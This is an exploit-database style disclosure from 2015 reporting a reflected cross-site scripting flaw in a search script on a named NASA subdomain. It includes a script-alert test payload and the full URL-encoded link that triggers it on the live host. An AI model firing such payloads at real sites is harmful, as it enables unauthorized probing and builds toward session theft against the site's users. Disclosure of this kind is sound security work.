# Exploit Title : NASA Subdomain XSS Vulnerability
# Exploit Author : 4TT4CK3R
# Date : 2015/12/27
# Tested on : Kali linux , Windows 8.1
# Vendor HomePage : https://ghrc.nsstc.nasa.gov/
# Google Dork : No
# Category : Web Application



~ # : Vulnerable Location :https://ghrc.nsstc.nasa.gov/hydro/search.pl

~ # : Using this script for XSS Vunerability Testing :
<script>alert('4TT4CK3R')</script>

~ # : Our Finally address is
:https://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3E



# Discovered by : 4TT4CK3R
# Hacker is not who deface a website with GoogleDork Which it shared
with another person :)
# I know nothing, It's too soon to say "I KNOW"
# Cyber Police